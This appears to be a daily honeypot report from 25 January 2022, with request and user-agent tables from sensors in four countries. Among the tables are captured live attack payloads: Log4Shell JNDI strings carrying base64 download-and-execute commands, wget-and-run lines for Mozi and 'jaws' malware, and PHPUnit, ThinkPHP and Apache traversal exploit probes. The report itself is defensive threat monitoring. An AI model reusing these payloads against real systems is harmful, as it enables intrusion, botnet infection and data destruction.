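Honeypot (tentative) observation record for 2022/01/25.
Characteristics
Common
Access targeting vulnerabilities in D-Link products
Access targeting the PHPUnit vulnerability (CVE-2017-9841)
Scanning by zgrab
Scanning for /.env
Scanning for Apache Tomcat
Location:JP
Access targeting the Apache HTTP Server vulnerability (CVE-2021-41773)
Access targeting GPON router vulnerabilities
Access targeting the Liferay Portal JSON Web Service vulnerability (CVE-2020-7961)
Access targeting ThinkPHP vulnerabilities
Scanning by IDBTE4M CODE87
Scanning for /.git
Scanning for Apache Solr
Scanning for Laravel
Scanning for WordPress plugins
Scanning for WordPress
The above were observed.
Location:US
Access targeting the Liferay Portal JSON Web Service vulnerability (CVE-2020-7961)
Access targeting vulnerabilities in NetGear products
Scanning by aiohttp
Scanning for Laravel
Malicious traffic related to 85.206.160.115
The above were observed.
Location:UK
Access targeting the Apache HTTP Server vulnerability (CVE-2021-41773)
Access targeting the Apache Log4j2 vulnerability (CVE-2021-44228)
Access targeting the Liferay Portal JSON Web Service vulnerability (CVE-2020-7961)
Access targeting ThinkPHP vulnerabilities
Scanning by curl
Scanning for Apache Solr
Scanning for Laravel
Scanning for phpMyAdmin
Malicious traffic related to 5.188.210.227
Malicious traffic related to 85.206.160.115
Access with the UserAgent "Hello, world"
The above were observed.
The following access to /shell was observed.
cd /tmp; rm -rf *; wget 0.0.0.0/jaws; sh /tmp/jaws
Location:SG
Access targeting the Apache HTTP Server vulnerability (CVE-2021-41773)
Access targeting the Apache Log4j2 vulnerability (CVE-2021-44228)
Access targeting GPON router vulnerabilities
Access targeting ThinkPHP vulnerabilities
Scanning by Nessus
Scanning by curl
Scanning for .js
Scanning for Apache Solr
Malicious traffic related to 85.206.160.115
Access with the UserAgent "Hello, World"
Access with the UserAgent "Hello, world"
The above were observed.
The following access to /shell was observed.
cd /tmp; rm -rf *; wget 0.0.0.0/jaws; sh /tmp/jaws
Other
Access count trend
JP: total accesses: 184 (change from previous day: 61)
US: total accesses: 49 (change from previous day: -31)
UK: total accesses: 48 (change from previous day: 8)
SG: total accesses: 144 (change from previous day: -28)
For practical reasons, GET / HTTP/1.1 and POST / HTTP/1.1 are excluded.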
Location:JP
Source IP addresses
UserAgent list
Count | UserAgent |
---|---|
5 | - |
1 | Go-http-client/1.1 |
1 | IDBTE4M CODE87 |
2 | Mozila/5.0 |
63 | Mozilla/5.0 (Linux x86_64; X11) AppleWebKit/536.30 (KHTML, like Gecko) Version/6.1.9 Safari/536.19 |
1 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 |
9 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
14 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36 |
40 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0 |
1 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36 |
41 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
2 | Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2 |
2 | Mozilla/5.0 zgrab/0.x |
Request list
Count | Method | Request | Protocol |
---|---|---|---|
1 | \x03 | | |
1 | \x16\x03\x01\x01\xfa\x01 | | |
1 | \x16\x03\x01 | | |
44 | GET | /.env | HTTP/1.1 |
1 | GET | /.git/config | HTTP/1.1 |
1 | GET | /.local | HTTP/1.1 |
1 | GET | /.production | HTTP/1.1 |
1 | GET | /.remote | HTTP/1.1 |
1 | GET | //admin/.env | HTTP/1.1 |
1 | GET | //administrator/.env | HTTP/1.1 |
1 | GET | //api/.env | HTTP/1.1 |
1 | GET | //app/.env | HTTP/1.1 |
1 | GET | //apps/.env | HTTP/1.1 |
1 | GET | //assets/.env | HTTP/1.1 |
1 | GET | //config/.env | HTTP/1.1 |
1 | GET | //core/.env | HTTP/1.1 |
1 | GET | //core/Datavase/.env | HTTP/1.1 |
1 | GET | //core/app/.env | HTTP/1.1 |
1 | GET | //cron/.env | HTTP/1.1 |
1 | GET | //cronlab/.env | HTTP/1.1 |
1 | GET | //database/.env | HTTP/1.1 |
1 | GET | //en/.env | HTTP/1.1 |
1 | GET | //exapi/.env | HTTP/1.1 |
1 | GET | //lab/.env | HTTP/1.1 |
1 | GET | //laravel/.env | HTTP/1.1 |
1 | GET | //lib/.env | HTTP/1.1 |
1 | GET | //psnlink/.env | HTTP/1.1 |
1 | GET | //public/.env | HTTP/1.1 |
1 | GET | //saas/.env | HTTP/1.1 |
1 | GET | //site/.env | HTTP/1.1 |
1 | GET | //sitemaps/.env | HTTP/1.1 |
1 | GET | //tools/.env | HTTP/1.1 |
1 | GET | //uploads/.env | HTTP/1.1 |
1 | GET | //v1/.env | HTTP/1.1 |
1 | GET | //v2/.env | HTTP/1.1 |
1 | GET | //vendor/.env | HTTP/1.1 |
1 | GET | //web/.env | HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> | HTTP/1.1 |
1 | GET | /_ignition/execute-solution | HTTP/1.1 |
1 | GET | /admin/.env | HTTP/1.1 |
1 | GET | /api/.env | HTTP/1.1 |
1 | GET | /api/ | HTTP/1.1 |
1 | GET | /app/.env | HTTP/1.1 |
1 | GET | /application/.env | HTTP/1.1 |
1 | GET | /apps/.env | HTTP/1.1 |
1 | GET | /auth/.env | HTTP/1.1 |
1 | GET | /back/.env | HTTP/1.1 |
1 | GET | /backend/.env | HTTP/1.1 |
1 | GET | /blog/wp-includes/wlwmanifest.xml | HTTP/1.1 |
1 | GET | /boaform/admin/formLogin?username=ec8&psd=ec8 | HTTP/1.0 |
1 | GET | /cli/.env | HTTP/1.1 |
1 | GET | /cluster/cluster/ | HTTP/1.1 |
1 | GET | /cms/wp-includes/wlwmanifest.xml | HTTP/1.1 |
1 | GET | /config/.env | HTTP/1.1 |
1 | GET | /console/ | HTTP/1.1 |
1 | GET | /core/.env | HTTP/1.1 |
1 | GET | /cp/.env | HTTP/1.1 |
1 | GET | /dependencies/.env | HTTP/1.1 |
1 | GET | /deployment/.env | HTTP/1.1 |
1 | GET | /dev/.env | HTTP/1.1 |
1 | GET | /development/.env | HTTP/1.1 |
2 | GET | /dispatch.asp | HTTP/1.1 |
1 | GET | /docker/.env | HTTP/1.1 |
1 | GET | /document/.env | HTTP/1.1 |
1 | GET | /engine/.env | HTTP/1.1 |
1 | GET | /favicon.ico | HTTP/1.1 |
1 | GET | /framework/.env | HTTP/1.1 |
1 | GET | /frontend/.env | HTTP/1.1 |
1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 | HTTP/1.1 |
1 | GET | /laravel-artisa/.env | HTTP/1.1 |
1 | GET | /laravel/.env | HTTP/1.1 |
1 | GET | /local/.env | HTTP/1.1 |
1 | GET | /login/.env | HTTP/1.1 |
1 | GET | /manager/html | HTTP/1.1 |
1 | GET | /manager/text/list | HTTP/1.1 |
1 | GET | /master/.env | HTTP/1.1 |
1 | GET | /news/wp-includes/wlwmanifest.xml | HTTP/1.1 |
1 | GET | /personal/.env | HTTP/1.1 |
1 | GET | /private/.env | HTTP/1.1 |
1 | GET | /project/.env | HTTP/1.1 |
1 | GET | /protected/.env | HTTP/1.1 |
1 | GET | /rest/.env | HTTP/1.1 |
1 | GET | /search/.env | HTTP/1.1 |
1 | GET | /server/.env | HTTP/1.1 |
1 | GET | /shared/.env | HTTP/1.1 |
1 | GET | /site/.env | HTTP/1.1 |
1 | GET | /site/wp-includes/wlwmanifest.xml | HTTP/1.1 |
1 | GET | /sito/wp-includes/wlwmanifest.xml | HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
1 | GET | /src/.env | HTTP/1.1 |
1 | GET | /system/.env | HTTP/1.1 |
1 | GET | /test/wp-includes/wlwmanifest.xml | HTTP/1.1 |
1 | GET | /vod_installer/.env | HTTP/1.1 |
1 | GET | /vue/.env | HTTP/1.1 |
1 | GET | /web/.env | HTTP/1.1 |
1 | GET | /web/wp-includes/wlwmanifest.xml | HTTP/1.1 |
1 | GET | /website/wp-includes/wlwmanifest.xml | HTTP/1.1 |
1 | GET | /wordpress/wp-includes/wlwmanifest.xml | HTTP/1.1 |
1 | GET | /wp-includes/wlwmanifest.xml | HTTP/1.1 |
1 | GET | /wp/wp-includes/wlwmanifest.xml | HTTP/1.1 |
1 | GET | /wp1/wp-includes/wlwmanifest.xml | HTTP/1.1 |
1 | GET | /wp2/wp-includes/wlwmanifest.xml | HTTP/1.1 |
1 | GET | /xmlrpc.php?rsd | HTTP/1.1 |
1 | POST | //admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | POST | //api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | POST | //backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | POST | //blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | POST | //cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | POST | //demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | POST | //dev/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | POST | //laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | POST | //lib/phpunit/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | POST | //lib/phpunit/phpunit/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | POST | //lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | POST | //lib/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | POST | //new/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | POST | //old/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | POST | //panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | POST | //phpunit/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | POST | //phpunit/phpunit/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | POST | //phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | POST | //phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | POST | //protected/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | POST | //sites/all/libraries/mailchimp/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | POST | //vendor/phpunit/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | POST | //vendor/phpunit/phpunit/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | POST | //vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | POST | //vendor/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | POST | //wp-content/plugins/cloudflare/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | POST | //wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | POST | //wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | POST | //wp-content/plugins/mm-plugin/inc/vendors/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | POST | //www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | POST | /Autodiscover/Autodiscover.xml | HTTP/1.1 |
1 | POST | /HNAP1/ | HTTP/1.0 |
2 | POST | /HNAP1/ | HTTP/1.1 |
1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh | HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
Location:US
Source IP addresses
UserAgent list
Count | UserAgent |
---|---|
6 | - |
6 | Mozila/5.0 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3829.0 Safari/537.36 Edg/77.0.197.1 |
6 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36 |
20 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
2 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
2 | Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2 |
2 | Mozilla/5.0 zgrab/0.x |
1 | Python/3.7 aiohttp/3.7.4.post0 |
1 | libwww-perl/6.61 |
Request list
Count | Method | Request | Protocol |
---|---|---|---|
3 | - | | |
1 | \x16\x03\x01 | | |
1 | CONNECT | 85[.]206[.]160[.]115:80 | HTTP/1.1 |
22 | GET | /.env | HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> | HTTP/1.1 |
1 | GET | /_ignition/execute-solution | HTTP/1.1 |
1 | GET | /cluster/cluster/ | HTTP/1.1 |
2 | GET | /config/getuser?index=0 | HTTP/1.1 |
1 | GET | /console/ | HTTP/1.1 |
2 | GET | /dispatch.asp | HTTP/1.1 |
1 | GET | /favicon.ico | HTTP/1.1 |
1 | GET | /level/15/exec/-/sh/run/CR | HTTP/1.1 |
1 | GET | /manager/html | HTTP/1.1 |
1 | GET | /manager/text/list | HTTP/1.1 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 | HTTP/1.0 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
6 | POST | /HNAP1/ | HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
Location:UK
Source IP addresses
UserAgent list
Count | UserAgent |
---|---|
14 | - |
1 | Hello, world |
5 | Mozila/5.0 |
3 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3464.0 Safari/537.36 |
9 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 6.2; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 |
1 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
4 | Mozilla/5.0 (compatible;) |
4 | Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2 |
2 | Mozilla/5.0 zgrab/0.x |
2 | curl/7.75.0 |
1 | t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//5[.]181[.]80[.]103:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IGN1cmwgaHR0cDovLzE5Mi45NS41MC4yMjgvYmlucy5zaCAtbyBiaW5zLnNoOyB3Z2V0IGh0dHA6Ly8xOTIuOTUuNTAuMjI4L2JpbnMuc2g7IGNobW9kIDc3NyBiaW5zLnNoOyBzaCBiaW5zLnNoOyBybSAtcmYgYmlucy5zaDsgaGlzdG9yeSAtYyA=}') |
Request list
Count | Method | Request | Protocol |
---|---|---|---|
2 | - | | |
1 | 27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ | HTTP/1.0 | |
3 | \x03 | | |
1 | \x16\x03\x01\x01\xfc\x01 | | |
2 | \x16\x03\x01\x02 | | |
2 | \x16\x03\x01 | | |
1 | CONNECT | 85[.]206[.]160[.]115:80 | HTTP/1.1 |
1 | GET | /.env | HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> | HTTP/1.1 |
1 | GET | /HNAP1 | HTTP/1.1 |
1 | GET | /_ignition/execute-solution | HTTP/1.1 |
1 | GET | /ab2g | HTTP/1.1 |
1 | GET | /ab2h | HTTP/1.1 |
1 | GET | /cluster/cluster/ | HTTP/1.1 |
1 | GET | /console/ | HTTP/1.1 |
4 | GET | /dispatch.asp | HTTP/1.1 |
1 | GET | /evox/about | HTTP/1.1 |
1 | GET | /favicon.ico | HTTP/1.1 |
1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 | HTTP/1.1 |
1 | GET | /manager/html | HTTP/1.1 |
1 | GET | /manager/text/list | HTTP/1.1 |
1 | GET | /phpmyadmin/index.php | HTTP/1.1 |
2 | GET | /pmd/index.php | HTTP/1.1 |
1 | GET | /robots.txt | HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+0[.]0[.]0[.]0/jaws;sh+/tmp/jaws | HTTP/1.1 |
1 | GET | /solr/admin/collections?action=t(%27$%7B$%7Benv:BARFOO:-j%7Dndi$%7Benv:BARFOO:-:%7D$%7Benv:BARFOO:-l%7Ddap$%7Benv:BARFOO:-:%7D//5[.]181[.]80[.]103:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IGN1cmwgaHR0cDovLzE5Mi45NS41MC4yMjgvYmlucy5zaCAtbyBiaW5zLnNoOyB3Z2V0IGh0dHA6Ly8xOTIuOTUuNTAuMjI4L2JpbnMuc2g7IGNobW9kIDc3NyBiaW5zLnNoOyBzaCBiaW5zLnNoOyBybSAtcmYgYmlucy5zaDsgaGlzdG9yeSAtYyA=%7D%27)&wt=json | HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
1 | GET | /text4041643039361 | HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | GET | http[:]//5[.]188[.]210[.]227/echo.php | HTTP/1.1 |
5 | POST | /HNAP1/ | HTTP/1.1 |
1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh | HTTP/1.1 |
1 | POST | /sdk | HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
Location:SG
Source IP addresses
UserAgent list
Count | UserAgent |
---|---|
18 | - |
1 | Hello, World |
1 | Hello, world |
3 | Mozila/5.0 |
74 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0) |
1 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
2 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0 |
7 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
22 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
2 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
2 | Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2 |
2 | Mozilla/5.0 zgrab/0.x |
6 | Nessus |
1 | curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.27.1 zlib/1.2.3 libidn/1.18 libssh2/1.4.2 |
1 | t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//5[.]181[.]80[.]103:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IGN1cmwgaHR0cDovLzE5Mi45NS41MC4yMjgvYmlucy5zaCAtbyBiaW5zLnNoOyB3Z2V0IGh0dHA6Ly8xOTIuOTUuNTAuMjI4L2JpbnMuc2g7IGNobW9kIDc3NyBiaW5zLnNoOyBzaCBiaW5zLnNoOyBybSAtcmYgYmlucy5zaDsgaGlzdG9yeSAtYyA=}') |
1 | t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//5[.]181[.]80[.]103:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IHdnZXQgaHR0cDovLzUxLjE2MS42NC4xOTgvaW5zdGFsbC5zaDsgY2htb2QgNzc3IGluc3RhbGwuc2g7IHNoIGluc3RhbGwuc2g=}') |
Request list
Count | Method | Request | Protocol |
---|---|---|---|
2 | - | | |
3 | \x03 | | |
2 | \x16\x03\x01\x02 | | |
1 | CONNECT | 85[.]206[.]160[.]115:80 | HTTP/1.1 |
1 | GET | /.cobalt | HTTP/1.1 |
23 | GET | /.env | HTTP/1.1 |
2 | GET | /.well-known/security.txt | HTTP/1.1 |
1 | GET | // | HTTP/1.1 |
1 | GET | /:undefined | HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> | HTTP/1.1 |
1 | GET | /ControlManager/default.htm | HTTP/1.1 |
1 | GET | /HNAP1/ | HTTP/1.1 |
1 | GET | /Home.do | HTTP/1.1 |
1 | GET | /MSWSMTP/Common/Authentication/Logon.aspx | HTTP/1.1 |
1 | GET | /ab2g | HTTP/1.1 |
1 | GET | /ab2h | HTTP/1.1 |
1 | GET | /admin.back | HTTP/1.1 |
1 | GET | /admin/login.do | HTTP/1.1 |
1 | GET | /admin/login.jsp | HTTP/1.1 |
1 | GET | /authenticate/login | HTTP/1.1 |
1 | GET | /cgi-bin/qeSj0rzuLdQ3.asp | HTTP/1.1 |
1 | GET | /cgi-bin/qeSj0rzuLdQ3.cfm | HTTP/1.1 |
1 | GET | /cgi-bin/qeSj0rzuLdQ3.cgi | HTTP/1.1 |
1 | GET | /cgi-bin/qeSj0rzuLdQ3.html | HTTP/1.1 |
1 | GET | /cgi-bin/qeSj0rzuLdQ3.inc | HTTP/1.1 |
1 | GET | /cgi-bin/qeSj0rzuLdQ3.php3 | HTTP/1.1 |
1 | GET | /cgi-bin/qeSj0rzuLdQ3.php | HTTP/1.1 |
1 | GET | /cgi-bin/qeSj0rzuLdQ3.pl | HTTP/1.1 |
1 | GET | /cgi-bin/qeSj0rzuLdQ3.sh | HTTP/1.1 |
1 | GET | /cgi-bin/qeSj0rzuLdQ3.shtml | HTTP/1.1 |
1 | GET | /commoncgi/servlet/CCGIServlet?ApHost=PDT_InterScan_NT&CGIAlias=PDT_InterScan_NT&File=logout.htm | HTTP/1.1 |
2 | GET | /config/getuser?index=0 | HTTP/1.1 |
1 | GET | /console/ | HTTP/1.1 |
1 | GET | /ddem/ | HTTP/1.1 |
2 | GET | /dispatch.asp | HTTP/1.1 |
1 | GET | /dms2/Login.jsp | HTTP/1.1 |
1 | GET | /en/main.js | HTTP/1.1 |
2 | GET | /favicon.ico | HTTP/1.1 |
1 | GET | /file | HTTP/1.1 |
2 | GET | /header.php?tab=status | HTTP/1.1 |
1 | GET | /home.htm | HTTP/1.1 |
1 | GET | /index.html | HTTP/1.1 |
1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 | HTTP/1.1 |
1 | GET | /index.php | HTTP/1.1 |
1 | GET | /intruvert/jsp/admin/Login.jsp | HTTP/1.1 |
1 | GET | /js/Device.js | HTTP/1.1 |
1 | GET | /links_en.html | HTTP/1.1 |
1 | GET | /login.htm | HTTP/1.1 |
1 | GET | /login.html | HTTP/1.1 |
1 | GET | /login.php | HTTP/1.1 |
3 | GET | /login?redirects=10 | HTTP/1.1 |
1 | GET | /loginMsg.js | HTTP/1.1 |
2 | GET | /login | HTTP/1.1 |
1 | GET | /manager/html | HTTP/1.1 |
1 | GET | /manager/text/list | HTTP/1.1 |
1 | GET | /mgmt/login?dest=%2Fmgmt%2Fgui%3Fp%3Dhome&reason=&username= | HTTP/1.1 |
1 | GET | /netmri/config/userAdmin/login.tdf | HTTP/1.1 |
1 | GET | /properties/configuration.php?tab=Status | HTTP/1.1 |
1 | GET | /properties/description.dhtml | HTTP/1.1 |
1 | GET | /ptz.htm | HTTP/1.1 |
1 | GET | /qeSj0rzuLdQ3.asp | HTTP/1.1 |
1 | GET | /qeSj0rzuLdQ3.cfm | HTTP/1.1 |
1 | GET | /qeSj0rzuLdQ3.cgi | HTTP/1.1 |
1 | GET | /qeSj0rzuLdQ3.html | HTTP/1.1 |
1 | GET | /qeSj0rzuLdQ3.inc | HTTP/1.1 |
1 | GET | /qeSj0rzuLdQ3.php3 | HTTP/1.1 |
1 | GET | /qeSj0rzuLdQ3.php | HTTP/1.1 |
1 | GET | /qeSj0rzuLdQ3.pl | HTTP/1.1 |
1 | GET | /qeSj0rzuLdQ3.sh | HTTP/1.1 |
1 | GET | /qeSj0rzuLdQ3.shtml | HTTP/1.1 |
3 | GET | /robots.txt | HTTP/1.1 |
1 | GET | /scgi-bin/platform.cgi | HTTP/1.1 |
1 | GET | /scripts/qeSj0rzuLdQ3.asp | HTTP/1.1 |
1 | GET | /scripts/qeSj0rzuLdQ3.cfm | HTTP/1.1 |
1 | GET | /scripts/qeSj0rzuLdQ3.cgi | HTTP/1.1 |
1 | GET | /scripts/qeSj0rzuLdQ3.html | HTTP/1.1 |
1 | GET | /scripts/qeSj0rzuLdQ3.inc | HTTP/1.1 |
1 | GET | /scripts/qeSj0rzuLdQ3.php3 | HTTP/1.1 |
1 | GET | /scripts/qeSj0rzuLdQ3.php | HTTP/1.1 |
1 | GET | /scripts/qeSj0rzuLdQ3.pl | HTTP/1.1 |
1 | GET | /scripts/qeSj0rzuLdQ3.sh | HTTP/1.1 |
1 | GET | /scripts/qeSj0rzuLdQ3.shtml | HTTP/1.1 |
1 | GET | /server-info | HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+0[.]0[.]0[.]0/jaws;sh+/tmp/jaws | HTTP/1.1 |
3 | GET | /sitemap.xml | HTTP/1.1 |
